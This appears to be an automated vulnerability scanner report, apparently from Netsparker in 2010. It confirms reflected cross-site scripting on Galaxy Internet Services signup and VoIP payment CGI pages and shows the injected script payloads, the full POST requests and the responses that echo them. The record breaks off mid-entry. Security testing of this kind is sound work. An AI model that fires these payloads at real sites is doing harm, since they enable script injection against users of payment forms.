<HTML><BODY BGCOLOR="#FFFFFF"><HTML><HEAD><TITLE>Galaxy Internet Services | Signup Online</TITLE></HEAD><BODY BACKGROUND="../images/bg1.gif" MARGINHEIGHT="0" MARGINWIDTH="0" LEFTMARGIN=0 TOPMARGIN=0><TABLE CELLPADDING=0 CELLSPACING=0 BORDER=0><TD><A HREF="http://www.gis.net/index.html"><IMG BORDER=0 SRC="../images/logobar.gif" WIDTH=610 HEIGHT=62 ALT="Welcome To Galaxy Internet Services"></A></TD> <TR><TD><TABLE CELLPADDING=5 CELLSPACING=0 BORDER=0><TD WIDTH=459 VALIGN=TOP> <CENTER> <TABLE><TD WIDTH=430> <FONT SIZE=+1 FACE="VERDANA, ARIAL, HELVETICA">WEB HOSTING</FONT><BR> </TD></TABLE> <!-- ITEMS --> <TABLE BORDER=0 WIDTH=435 CELLPADDING=2><TD BGCOLOR="#000066"> <FONT COLOR="#FFFFFF" SIZE="-2" FACE="VERDANA, ARIAL, HELVETICA"> <B>ENTER BILLING AND ACCOUNT INFO</B> </FONT></TD></TABLE> <TABLE><TD WIDTH=420> <FONT FACE="VERDANA, ARIAL, HELVETICA" SIZE=-1> <FORM METHOD="POST" ACTION="webhost2_c2.cgi"><INPUT NAME="NAME" TYPE="HIDDEN" VALUE="Economy Hosting"><INPUT NAME="EMAIL" TYPE="HIDDEN" VALUE="3"><INPUT NAME="STREET" TYPE="HIDDEN" VALUE="3"><INPUT NAME="CITY" TYPE="HIDDEN" VALUE="'"--><script>netsparker(0x00072A)</script>"><INPUT NAME="STATE" TYPE="HIDDEN" VALUE="Ronald+Smith"><INPUT NAME="ZIP" TYPE="HIDDEN" VALUE="3"><INPUT NAME="PHONE" TYPE="HIDDEN" VALUE="3"><INPUT NAME="DOMAIN" TYPE="HIDDEN" VALUE="3"><INPUT NAME="TYPE" TYPE="HIDDEN" VALUE="3"> <B>Account Type:<BR> 3, 3</B><P> Credit Card Type:<BR> <SELECT NAME="CARDTYPE"> <OPTION>MasterCard <OPTION>Visa <OPTION>American Express </SELECT> <P> Credit Card Number:<BR> <INPUT TYPE="TEXT" NAME="NAME" SIZE=16 MAXLENGTH=16><P> Credit Card Expiration Date:<BR> <SELECT NAME=EXPMONTH"> <OPTION> <OPTION>01 <OPTION>02 <OPTION>03 <OPTION>04 <OPTION>05 <OPTION>06 <OPTION>07 <OPTION>08 <OPTION>09 <OPTION>10 <OPTION>11 <OPTION>12 </SELECT> / <SELECT NAME="EXPYEAR"> <OPTION> <OPTION>07 <OPTION>08 <OPTION>09 <OPTION>10 <OPTION>11 <OPTION>12 <OPTION>13 <OPTION>14 </SELECT> <P> </SELECT> <P> <TABLE BORDER=0 CELLPADDING=0 CELLSPACING=0><TD> <FONT SIZE=-1> Login Name:<BR> <INPUT TYPE="TEXT" NAME="LOGIN" SIZE=8 MAXLENGTH=8> </TD><TD></FONT> &nbsp &nbsp <FONT SIZE=-1> Password:<BR></FONT> &nbsp &nbsp <INPUT TYPE="PASSWORD" NAME="PASSWD" SIZE=8 MAXLENGTH=12> </TD></TABLE> <FONT SIZE=-2>Your login name must be 2 - 8 characters, numbers or letters, all lower case. The login name and password are used to upload your website and may also be used as a mailbox. </FONT> <P> Mother's Maiden Name:<BR> <INPUT TYPE="TEXT" NAME="MAIDENNAME" SIZE=20> <P> <INPUT TYPE=SUBMIT VALUE="Next -->"> </FORM> </FONT> </TD></TABLE> <P> <HR NOSHADE SIZE=1 WIDTH=400> <FONT SIZE=-2> Copyright 1999, Galaxy Internet Services<BR></FONT> </CENTER> </FONT> <P> </TD><TD WIDTH=135 VALIGN=TOP> <!-- SIDEBAR --> <P> </TD></TABLE></TD></TABLE></BODY></HTML>
- /webhosts/webhost_c2.cgi

/webhosts/webhost_c2.cgi CONFIRMED

https://secure.gis.net/webhosts/webhost_c2.cgi

Parameters

Parameter Type Value
ACCOUNTTYPE POST Economy Hosting
CITY POST 3
DOMAIN POST 3
EMAIL POST netsparker@example.com
NAME POST Ronald Smith
PHONE POST 3
STATE POST '"--><script>alert(0x00074F)</script>
STREET POST 3
ZIP POST 3

Request

POST /webhosts/webhost_c2.cgi HTTP/1.1
Referer: https://secure.gis.net/webhosts/
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Netsparker)
Cache-Control: no-cache
Content-Type: application/x-www-form-urlencoded
Host: secure.gis.net
Content-Length: 178
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

ACCOUNTTYPE=Economy+Hosting&CITY=3&DOMAIN=3&EMAIL=netsparker%40example.com&NAME=Ronald+Smith&PHONE=3&STATE='%22--%3e%3cscript%3enetsparker(0x00074F)%3c%2fscript%3e&STREET=3&ZIP=3

Response

HTTP/1.0 200 OK
Date: Sat, 25 Sep 2010 02:28:48 GMT
Server: Apache
Connection: close
Content-Type: text/html


<HTML><BODY BGCOLOR="#FFFFFF"><HTML><HEAD><TITLE>Galaxy Internet Services | Signup Online</TITLE></HEAD><BODY BACKGROUND="../images/bg1.gif" MARGINHEIGHT="0" MARGINWIDTH="0" LEFTMARGIN=0 TOPMARGIN=0><TABLE CELLPADDING=0 CELLSPACING=0 BORDER=0><TD><A HREF="http://www.gis.net/index.html"><IMG BORDER=0 SRC="../images/logobar.gif" WIDTH=610 HEIGHT=62 ALT="Welcome To Galaxy Internet Services"></A></TD> <TR><TD><TABLE CELLPADDING=5 CELLSPACING=0 BORDER=0><TD WIDTH=459 VALIGN=TOP> <CENTER> <TABLE><TD WIDTH=430> <FONT SIZE=+1 FACE="VERDANA, ARIAL, HELVETICA">WEB HOSTING</FONT><BR> </TD></TABLE> <!-- ITEMS --> <TABLE BORDER=0 WIDTH=435 CELLPADDING=2><TD BGCOLOR="#000066"> <FONT COLOR="#FFFFFF" SIZE="-2" FACE="VERDANA, ARIAL, HELVETICA"> <B>ENTER BILLING AND ACCOUNT INFO</B> </FONT></TD></TABLE> <TABLE><TD WIDTH=420> <FONT FACE="VERDANA, ARIAL, HELVETICA" SIZE=-1> <FORM METHOD="POST" ACTION="webhost2_c2.cgi"><INPUT NAME="NAME" TYPE="HIDDEN" VALUE="Economy Hosting"><INPUT NAME="EMAIL" TYPE="HIDDEN" VALUE="3"><INPUT NAME="STREET" TYPE="HIDDEN" VALUE="3"><INPUT NAME="CITY" TYPE="HIDDEN" VALUE="netsparker@example.com"><INPUT NAME="STATE" TYPE="HIDDEN" VALUE="Ronald+Smith"><INPUT NAME="ZIP" TYPE="HIDDEN" VALUE="3"><INPUT NAME="PHONE" TYPE="HIDDEN" VALUE="'"--><script>netsparker(0x00074F)</script>"><INPUT NAME="DOMAIN" TYPE="HIDDEN" VALUE="3"><INPUT NAME="TYPE" TYPE="HIDDEN" VALUE="3"> <B>Account Type:<BR> 3, 3</B><P> Credit Card Type:<BR> <SELECT NAME="CARDTYPE"> <OPTION>MasterCard <OPTION>Visa <OPTION>American Express </SELECT> <P> Credit Card Number:<BR> <INPUT TYPE="TEXT" NAME="NAME" SIZE=16 MAXLENGTH=16><P> Credit Card Expiration Date:<BR> <SELECT NAME=EXPMONTH"> <OPTION> <OPTION>01 <OPTION>02 <OPTION>03 <OPTION>04 <OPTION>05 <OPTION>06 <OPTION>07 <OPTION>08 <OPTION>09 <OPTION>10 <OPTION>11 <OPTION>12 </SELECT> / <SELECT NAME="EXPYEAR"> <OPTION> <OPTION>07 <OPTION>08 <OPTION>09 <OPTION>10 <OPTION>11 <OPTION>12 <OPTION>13 <OPTION>14 </SELECT> <P> </SELECT> <P> <TABLE BORDER=0 CELLPADDING=0 CELLSPACING=0><TD> <FONT SIZE=-1> Login Name:<BR> <INPUT TYPE="TEXT" NAME="LOGIN" SIZE=8 MAXLENGTH=8> </TD><TD></FONT> &nbsp &nbsp <FONT SIZE=-1> Password:<BR></FONT> &nbsp &nbsp <INPUT TYPE="PASSWORD" NAME="PASSWD" SIZE=8 MAXLENGTH=12> </TD></TABLE> <FONT SIZE=-2>Your login name must be 2 - 8 characters, numbers or letters, all lower case. The login name and password are used to upload your website and may also be used as a mailbox. </FONT> <P> Mother's Maiden Name:<BR> <INPUT TYPE="TEXT" NAME="MAIDENNAME" SIZE=20> <P> <INPUT TYPE=SUBMIT VALUE="Next -->"> </FORM> </FONT> </TD></TABLE> <P> <HR NOSHADE SIZE=1 WIDTH=400> <FONT SIZE=-2> Copyright 1999, Galaxy Internet Services<BR></FONT> </CENTER> </FONT> <P> </TD><TD WIDTH=135 VALIGN=TOP> <!-- SIDEBAR --> <P> </TD></TABLE></TD></TABLE></BODY></HTML>
- /webhosts/webhost_c2.cgi

/webhosts/webhost_c2.cgi CONFIRMED

https://secure.gis.net/webhosts/webhost_c2.cgi

Parameters

Parameter Type Value
ACCOUNTTYPE POST Economy Hosting
CITY POST 3
DOMAIN POST 3
EMAIL POST netsparker@example.com
NAME POST Ronald Smith
PHONE POST 3
STATE POST 3
STREET POST '"--><script>alert(0x000752)</script>
ZIP POST 3

Request

POST /webhosts/webhost_c2.cgi HTTP/1.1
Referer: https://secure.gis.net/webhosts/
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Netsparker)
Cache-Control: no-cache
Content-Type: application/x-www-form-urlencoded
Host: secure.gis.net
Content-Length: 178
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

ACCOUNTTYPE=Economy+Hosting&CITY=3&DOMAIN=3&EMAIL=netsparker%40example.com&NAME=Ronald+Smith&PHONE=3&STATE=3&STREET='%22--%3e%3cscript%3enetsparker(0x000752)%3c%2fscript%3e&ZIP=3

Response

HTTP/1.0 200 OK
Date: Sat, 25 Sep 2010 02:28:51 GMT
Server: Apache
Connection: close
Content-Type: text/html


<HTML><BODY BGCOLOR="#FFFFFF"><HTML><HEAD><TITLE>Galaxy Internet Services | Signup Online</TITLE></HEAD><BODY BACKGROUND="../images/bg1.gif" MARGINHEIGHT="0" MARGINWIDTH="0" LEFTMARGIN=0 TOPMARGIN=0><TABLE CELLPADDING=0 CELLSPACING=0 BORDER=0><TD><A HREF="http://www.gis.net/index.html"><IMG BORDER=0 SRC="../images/logobar.gif" WIDTH=610 HEIGHT=62 ALT="Welcome To Galaxy Internet Services"></A></TD> <TR><TD><TABLE CELLPADDING=5 CELLSPACING=0 BORDER=0><TD WIDTH=459 VALIGN=TOP> <CENTER> <TABLE><TD WIDTH=430> <FONT SIZE=+1 FACE="VERDANA, ARIAL, HELVETICA">WEB HOSTING</FONT><BR> </TD></TABLE> <!-- ITEMS --> <TABLE BORDER=0 WIDTH=435 CELLPADDING=2><TD BGCOLOR="#000066"> <FONT COLOR="#FFFFFF" SIZE="-2" FACE="VERDANA, ARIAL, HELVETICA"> <B>ENTER BILLING AND ACCOUNT INFO</B> </FONT></TD></TABLE> <TABLE><TD WIDTH=420> <FONT FACE="VERDANA, ARIAL, HELVETICA" SIZE=-1> <FORM METHOD="POST" ACTION="webhost2_c2.cgi"><INPUT NAME="NAME" TYPE="HIDDEN" VALUE="Economy Hosting"><INPUT NAME="EMAIL" TYPE="HIDDEN" VALUE="3"><INPUT NAME="STREET" TYPE="HIDDEN" VALUE="3"><INPUT NAME="CITY" TYPE="HIDDEN" VALUE="netsparker@example.com"><INPUT NAME="STATE" TYPE="HIDDEN" VALUE="Ronald+Smith"><INPUT NAME="ZIP" TYPE="HIDDEN" VALUE="3"><INPUT NAME="PHONE" TYPE="HIDDEN" VALUE="3"><INPUT NAME="DOMAIN" TYPE="HIDDEN" VALUE="'"--><script>netsparker(0x000752)</script>"><INPUT NAME="TYPE" TYPE="HIDDEN" VALUE="3"> <B>Account Type:<BR> 3, '"--><script>netsparker(0x000752)</script></B><P> Credit Card Type:<BR> <SELECT NAME="CARDTYPE"> <OPTION>MasterCard <OPTION>Visa <OPTION>American Express </SELECT> <P> Credit Card Number:<BR> <INPUT TYPE="TEXT" NAME="NAME" SIZE=16 MAXLENGTH=16><P> Credit Card Expiration Date:<BR> <SELECT NAME=EXPMONTH"> <OPTION> <OPTION>01 <OPTION>02 <OPTION>03 <OPTION>04 <OPTION>05 <OPTION>06 <OPTION>07 <OPTION>08 <OPTION>09 <OPTION>10 <OPTION>11 <OPTION>12 </SELECT> / <SELECT NAME="EXPYEAR"> <OPTION> <OPTION>07 <OPTION>08 <OPTION>09 <OPTION>10 <OPTION>11 <OPTION>12 <OPTION>13 <OPTION>14 </SELECT> <P> </SELECT> <P> <TABLE BORDER=0 CELLPADDING=0 CELLSPACING=0><TD> <FONT SIZE=-1> Login Name:<BR> <INPUT TYPE="TEXT" NAME="LOGIN" SIZE=8 MAXLENGTH=8> </TD><TD></FONT> &nbsp &nbsp <FONT SIZE=-1> Password:<BR></FONT> &nbsp &nbsp <INPUT TYPE="PASSWORD" NAME="PASSWD" SIZE=8 MAXLENGTH=12> </TD></TABLE> <FONT SIZE=-2>Your login name must be 2 - 8 characters, numbers or letters, all lower case. The login name and password are used to upload your website and may also be used as a mailbox. </FONT> <P> Mother's Maiden Name:<BR> <INPUT TYPE="TEXT" NAME="MAIDENNAME" SIZE=20> <P> <INPUT TYPE=SUBMIT VALUE="Next -->"> </FORM> </FONT> </TD></TABLE> <P> <HR NOSHADE SIZE=1 WIDTH=400> <FONT SIZE=-2> Copyright 1999, Galaxy Internet Services<BR></FONT> </CENTER> </FONT> <P> </TD><TD WIDTH=135 VALIGN=TOP> <!-- SIDEBAR --> <P> </TD></TABLE></TD></TABLE></BODY></HTML>
- /webhosts/webhost_c2.cgi

/webhosts/webhost_c2.cgi CONFIRMED

https://secure.gis.net/webhosts/webhost_c2.cgi

Parameters

Parameter Type Value
ACCOUNTTYPE POST Economy Hosting
CITY POST 3
DOMAIN POST 3
EMAIL POST netsparker@example.com
NAME POST Ronald Smith
PHONE POST 3
STATE POST 3
STREET POST 3
ZIP POST '"--><script>alert(0x000755)</script>

Request

POST /webhosts/webhost_c2.cgi HTTP/1.1
Referer: https://secure.gis.net/webhosts/
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Netsparker)
Cache-Control: no-cache
Content-Type: application/x-www-form-urlencoded
Host: secure.gis.net
Content-Length: 178
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

ACCOUNTTYPE=Economy+Hosting&CITY=3&DOMAIN=3&EMAIL=netsparker%40example.com&NAME=Ronald+Smith&PHONE=3&STATE=3&STREET=3&ZIP='%22--%3e%3cscript%3enetsparker(0x000755)%3c%2fscript%3e

Response

HTTP/1.0 200 OK
Date: Sat, 25 Sep 2010 02:28:53 GMT
Server: Apache
Connection: close
Content-Type: text/html


<HTML><BODY BGCOLOR="#FFFFFF"><HTML><HEAD><TITLE>Galaxy Internet Services | Signup Online</TITLE></HEAD><BODY BACKGROUND="../images/bg1.gif" MARGINHEIGHT="0" MARGINWIDTH="0" LEFTMARGIN=0 TOPMARGIN=0><TABLE CELLPADDING=0 CELLSPACING=0 BORDER=0><TD><A HREF="http://www.gis.net/index.html"><IMG BORDER=0 SRC="../images/logobar.gif" WIDTH=610 HEIGHT=62 ALT="Welcome To Galaxy Internet Services"></A></TD> <TR><TD><TABLE CELLPADDING=5 CELLSPACING=0 BORDER=0><TD WIDTH=459 VALIGN=TOP> <CENTER> <TABLE><TD WIDTH=430> <FONT SIZE=+1 FACE="VERDANA, ARIAL, HELVETICA">WEB HOSTING</FONT><BR> </TD></TABLE> <!-- ITEMS --> <TABLE BORDER=0 WIDTH=435 CELLPADDING=2><TD BGCOLOR="#000066"> <FONT COLOR="#FFFFFF" SIZE="-2" FACE="VERDANA, ARIAL, HELVETICA"> <B>ENTER BILLING AND ACCOUNT INFO</B> </FONT></TD></TABLE> <TABLE><TD WIDTH=420> <FONT FACE="VERDANA, ARIAL, HELVETICA" SIZE=-1> <FORM METHOD="POST" ACTION="webhost2_c2.cgi"><INPUT NAME="NAME" TYPE="HIDDEN" VALUE="Economy Hosting"><INPUT NAME="EMAIL" TYPE="HIDDEN" VALUE="3"><INPUT NAME="STREET" TYPE="HIDDEN" VALUE="3"><INPUT NAME="CITY" TYPE="HIDDEN" VALUE="netsparker@example.com"><INPUT NAME="STATE" TYPE="HIDDEN" VALUE="Ronald+Smith"><INPUT NAME="ZIP" TYPE="HIDDEN" VALUE="3"><INPUT NAME="PHONE" TYPE="HIDDEN" VALUE="3"><INPUT NAME="DOMAIN" TYPE="HIDDEN" VALUE="3"><INPUT NAME="TYPE" TYPE="HIDDEN" VALUE="'"--><script>netsparker(0x000755)</script>"> <B>Account Type:<BR> '"--><script>netsparker(0x000755)</script>, 3</B><P> Credit Card Type:<BR> <SELECT NAME="CARDTYPE"> <OPTION>MasterCard <OPTION>Visa <OPTION>American Express </SELECT> <P> Credit Card Number:<BR> <INPUT TYPE="TEXT" NAME="NAME" SIZE=16 MAXLENGTH=16><P> Credit Card Expiration Date:<BR> <SELECT NAME=EXPMONTH"> <OPTION> <OPTION>01 <OPTION>02 <OPTION>03 <OPTION>04 <OPTION>05 <OPTION>06 <OPTION>07 <OPTION>08 <OPTION>09 <OPTION>10 <OPTION>11 <OPTION>12 </SELECT> / <SELECT NAME="EXPYEAR"> <OPTION> <OPTION>07 <OPTION>08 <OPTION>09 <OPTION>10 <OPTION>11 <OPTION>12 <OPTION>13 <OPTION>14 </SELECT> <P> </SELECT> <P> <TABLE BORDER=0 CELLPADDING=0 CELLSPACING=0><TD> <FONT SIZE=-1> Login Name:<BR> <INPUT TYPE="TEXT" NAME="LOGIN" SIZE=8 MAXLENGTH=8> </TD><TD></FONT> &nbsp &nbsp <FONT SIZE=-1> Password:<BR></FONT> &nbsp &nbsp <INPUT TYPE="PASSWORD" NAME="PASSWD" SIZE=8 MAXLENGTH=12> </TD></TABLE> <FONT SIZE=-2>Your login name must be 2 - 8 characters, numbers or letters, all lower case. The login name and password are used to upload your website and may also be used as a mailbox. </FONT> <P> Mother's Maiden Name:<BR> <INPUT TYPE="TEXT" NAME="MAIDENNAME" SIZE=20> <P> <INPUT TYPE=SUBMIT VALUE="Next -->"> </FORM> </FONT> </TD></TABLE> <P> <HR NOSHADE SIZE=1 WIDTH=400> <FONT SIZE=-2> Copyright 1999, Galaxy Internet Services<BR></FONT> </CENTER> </FONT> <P> </TD><TD WIDTH=135 VALIGN=TOP> <!-- SIDEBAR --> <P> </TD></TABLE></TD></TABLE></BODY></HTML>
- /voip/voip_c2.cgi

/voip/voip_c2.cgi CONFIRMED

https://secure.gis.net/voip/voip_c2.cgi

Parameters

Parameter Type Value
FIRSTNAME POST Ronald Smith
LASTNAME POST Ronald Smith
COMPANY POST 3
STREET POST 3
CITY POST 3
STATE POST 3
ZIP POST 3
PHONE POST 3
EMAIL POST netsparker@example.com
BILLINGSTREET POST 3
BILLINGCITY POST 3
BILLINGSTATE POST 3
BILLINGZIP POST 3
SOURCE POST 3
INTERNETTYPE POST 3
REQUESTEDSTATE POST 3
RATECENTER POST 3
CARDTYPE POST '"--><script>alert(0x000ABA)</script>
CCNUM POST 3
EXPMONTH POST 3
EXPYEAR POST 3
NAMEONCARD POST Ronald Smith
OFFERCODE POST 3
tosagree POST agree
Free_Service POST Free_VOIP_Service
ACCOUNTTYPE POST Region 1 Business Unlimited
monthlytotal0 POST 0.00
monthlytotal1 POST 0.00
monthlytotal2 POST 0.00
monthlytotal3 POST 0.00
monthlytotal4 POST 0.00
monthlytotal POST 0.00
Activation_Fee POST Activation_Fee
PHONETYPE POST I Will Provide My Own SIP Compatible Phone
onetimetotal0 POST 0
onetimetotal2 POST 0
pcphone POST 0.00
onetimetotal3 POST 0.00
onetimetotal POST 24.95
COMMENTS POST 3

Request

POST /voip/voip_c2.cgi HTTP/1.1
Referer: https://secure.gis.net/voip/free.html
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Netsparker)
Cache-Control: no-cache
Content-Type: application/x-www-form-urlencoded
Host: secure.gis.net
Content-Length: 742
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

FIRSTNAME=Ronald+Smith&LASTNAME=Ronald+Smith&COMPANY=3&STREET=3&CITY=3&STATE=3&ZIP=3&PHONE=3&EMAIL=netsparker%40example.com&BILLINGSTREET=3&BILLINGCITY=3&BILLINGSTATE=3&BILLINGZIP=3&SOURCE=3&INTERNETTYPE=3&REQUESTEDSTATE=3&RATECENTER=3&CARDTYPE='%22--%3e%3cscript%3enetsparker(0x000ABA)%3c%2fscript%3e&CCNUM=3&EXPMONTH=3&EXPYEAR=3&NAMEONCARD=Ronald+Smith&OFFERCODE=3&tosagree=agree&Free_Service=Free_VOIP_Service&ACCOUNTTYPE=Region+1+Business+Unlimited&monthlytotal0=0.00&monthlytotal1=0.00&monthlytotal2=0.00&monthlytotal3=0.00&monthlytotal4=0.00&monthlytotal=0.00&Activation_Fee=Activation_Fee&PHONETYPE=I+Will+Provide+My+Own+SIP+Compatible+Phone&onetimetotal0=0&onetimetotal2=0&pcphone=0.00&onetimetotal3=0.00&onetimetotal=24.95&COMMENTS=3

Response

HTTP/1.0 200 OK
Date: Sat, 25 Sep 2010 02:46:47 GMT
Server: Apache
Connection: close
Content-Type: text/html


<HTML><BODY BGCOLOR="#FFFFFF"><CENTER><BR><BR><B><FONT COLOR="RED">SORRY - THE CARD NUMBER YOU ENTERED IS INVALID</B><p>Type: '"--><script>netsparker(0x000ABA)</script> <P>3<P></FONT><P><B>PLEASE GO BACK AND ENTER A CORRECT CARD NUMBER.</BODY></HTML>
- /voip/voip_c2.cgi

/voip/voip_c2.cgi CONFIRMED

https://secure.gis.net/voip/voip_c2.cgi

Parameters

Parameter Type Value
FIRSTNAME POST Ronald Smith
LASTNAME POST Ronald Smith
COMPANY POST 3
STREET POST 3
CITY POST 3
STATE POST 3
ZIP POST 3
PHONE POST 3
EMAIL POST netsparker@example.com
BILLINGSTREET POST 3
BILLINGCITY POST 3
BILLINGSTATE POST 3
BILLINGZIP POST 3
SOURCE POST 3
INTERNETTYPE POST 3
REQUESTEDSTATE POST 3
RATECENTER POST 3
CARDTYPE POST MC
CCNUM POST '"--><script>alert(0x000ABB)</script>
EXPMONTH POST 3
EXPYEAR POST 3
NAMEONCARD POST Ronald Smith
OFFERCODE POST 3
tosagree POST agree
Free_Service POST Free_VOIP_Service
ACCOUNTTYPE POST Region 1 Business Unlimited
monthlytotal0 POST 0.00
monthlytotal1 POST 0.00
monthlytotal2 POST 0.00
monthlytotal3 POST 0.00
monthlytotal4 POST 0.00
monthlytotal POST 0.00
Activation_Fee POST Activation_Fee
PHONETYPE POST I Will Provide My Own SIP Compatible Phone
onetimetotal0 POST 0
onetimetotal2 POST 0
pcphone POST 0.00
onetimetotal3 POST 0.00
onetimetotal POST 24.95
COMMENTS POST 3

Request

POST /voip/voip_c2.cgi HTTP/1.1
Referer: https://secure.gis.net/voip/free.html
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Netsparker)
Cache-Control: no-cache
Content-Type: application/x-www-form-urlencoded
Host: secure.gis.net
Content-Length: 743
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

FIRSTNAME=Ronald+Smith&LASTNAME=Ronald+Smith&COMPANY=3&STREET=3&CITY=3&STATE=3&ZIP=3&PHONE=3&EMAIL=netsparker%40example.com&BILLINGSTREET=3&BILLINGCITY=3&BILLINGSTATE=3&BILLINGZIP=3&SOURCE=3&INTERNETTYPE=3&REQUESTEDSTATE=3&RATECENTER=3&CARDTYPE=MC&CCNUM='%22--%3e%3cscript%3enetsparker(0x000ABB)%3c%2fscript%3e&EXPMONTH=3&EXPYEAR=3&NAMEONCARD=Ronald+Smith&OFFERCODE=3&tosagree=agree&Free_Service=Free_VOIP_Service&ACCOUNTTYPE=Region+1+Business+Unlimited&monthlytotal0=0.00&monthlytotal1=0.00&monthlytotal2=0.00&monthlytotal3=0.00&monthlytotal4=0.00&monthlytotal=0.00&Activation_Fee=Activation_Fee&PHONETYPE=I+Will+Provide+My+Own+SIP+Compatible+Phone&onetimetotal0=0&onetimetotal2=0&pcphone=0.00&onetimetotal3=0.00&onetimetotal=24.95&COMMENTS=3

Response

HTTP/1.0 200 OK
Date: Sat, 25 Sep 2010 02:46:49 GMT
Server: Apache
Connection: close
Content-Type: text/html


<HTML><BODY BGCOLOR="#FFFFFF"><CENTER><BR><BR><B><FONT COLOR="RED">SORRY - THE CARD NUMBER YOU ENTERED IS INVALID</B><p>Type: MC <P>'"><script>netsparker(0x000ABB)</script><P></FONT><P><B>PLEASE GO BACK AND ENTER A CORRECT CARD NUMBER.</BODY></HTML>
- /voip/voip_c2.cgi

/voip/voip_c2.cgi CONFIRMED

https://secure.gis.net/voip/voip_c2.cgi

Parameters

Parameter Type Value
FIRSTNAME POST Ronald Smith
LASTNAME POST Ronald Smith
COMPANY POST 3
STREET POST 3
CITY POST 3
STATE POST 3
ZIP POST 3
PHONE POST 3
EMAIL POST netsparker@example.com
BILLINGSTREET POST 3
BILLINGCITY POST 3
BILLINGSTATE POST 3
BILLINGZIP POST 3
SOURCE POST 3
INTERNETTYPE POST 3
REQUESTEDSTATE POST 3
CCNUM POST '"--><script>alert(0x000DC6)</script>
EXPMONTH POST 3
EXPYEAR POST 3
NAMEONCARD POST Ronald Smith
OFFERCODE POST 3
Free_Service POST Free_VOIP_Service
ACCOUNTTYPE POST Free
monthlytotal0 POST 0.00
monthlytotal1 POST 0.00
monthlytotal2 POST 0.00
monthlytotal3 POST 0.00
monthlytotal4 POST 0.00
monthlytotal POST 0.00
Activation_Fee POST Activation_Fee
onetimetotal0 POST 0
PHONETYPE POST I Will Provide My Own SIP Compatible Phone
onetimetotal2 POST 0
onetimetotal3 POST 0.00
onetimetotal POST 24.95
COMMENTS POST 3

Request

POST /voip/voip_c2.cgi HTTP/1.1
Referer: https://secure.gis.net/voip/free.html
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Netsparker)
Cache-Control: no-cache
Content-Type: application/x-www-form-urlencoded
Host: secure.gis.net
Content-Length: 667
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

FIRSTNAME=Ronald+Smith&LASTNAME=Ronald+Smith&COMPANY=3&STREET=3&CITY=3&STATE=3&ZIP=3&PHONE=3&EMAIL=netsparker%40example.com&BILLINGSTREET=3&BILLINGCITY=3&BILLINGSTATE=3&BILLINGZIP=3&SOURCE=3&INTERNETTYPE=3&REQUESTEDSTATE=3&CCNUM='%22--%3e%3cscript%3enetsparker(0x000DC6)%3c%2fscript%3e&EXPMONTH=3&EXPYEAR=3&NAMEONCARD=Ronald+Smith&OFFERCODE=3&Free_Service=Free_VOIP_Service&ACCOUNTTYPE=Free&monthlytotal0=0.00&monthlytotal1=0.00&monthlytotal2=0.00&monthlytotal3=0.00&monthlytotal4=0.00&monthlytotal=0.00&Activation_Fee=Activation_Fee&onetimetotal0=0&PHONETYPE=I+Will+Provide+My+Own+SIP+Compatible+Phone&onetimetotal2=0&onetimetotal3=0.00&onetimetotal=24.95&COMMENTS=3

Response

HTTP/1.0 200 OK
Date: Sat, 25 Sep 2010 03:02:59 GMT
Server: Apache
Connection: close
Content-Type: text/html


<HTML><BODY BGCOLOR="#FFFFFF"><CENTER><BR><BR><B><FONT COLOR="RED">SORRY - THE CARD NUMBER YOU ENTERED IS INVALID</B><p>Type: <P>'"><script>netsparker(0x000DC6)</script><P></FONT><P><B>PLEASE GO BACK AND ENTER A CORRECT CARD NUMBER.</BODY></HTML>
- /voip/voip_c2.cgi

/voip/voip_c2.cgi CONFIRMED

https://secure.gis.net/voip/voip_c2.cgi

Parameters

Parameter Type Value
FIRSTNAME POST Ronald Smith
LASTNAME POST Ronald Smith
COMPANY POST 3
STREET POST 3
CITY POST 3
STATE POST 3
ZIP POST 3
PHONE POST 3
EMAIL POST netsparker@example.com
BILLINGSTREET POST 3
BILLINGCITY POST 3
BILLINGSTATE POST 3
BILLINGZIP POST 3
SOURCE POST 3
INTERNETTYPE POST 3
REQUESTEDSTATE POST 3
CARDTYPE POST '"--><script>alert(0x00109E)</script>
CCNUM POST 3
EXPMONTH POST 3
EXPYEAR POST 3
NAMEONCARD POST Ronald Smith
OFFERCODE POST 3
tosagree POST agree
monthlytotal0 POST 0.00
monthlytotal1 POST 0.00
monthlytotal2 POST 0.00
monthlytotal3 POST 0.00
ACCOUNTTYPE POST Region 1 Business Unlimited
monthlytotal4 POST 39.95
monthlytotal POST 39.95
Activation_Fee POST Activation_Fee
onetimetotal0 POST 0
PHONETYPE POST I Will Provide My Own SIP Compatible Phone
onetimetotal2 POST 0
pcphone POST 0.00
onetimetotal3 POST 0.00
onetimetotal POST 24.95
COMMENTS POST 3

Request

POST /voip/voip_c2.cgi HTTP/1.1
Referer: https://secure.gis.net/voip/free.html
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Netsparker)
Cache-Control: no-cache
Content-Type: application/x-www-form-urlencoded
Host: secure.gis.net
Content-Length: 700
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

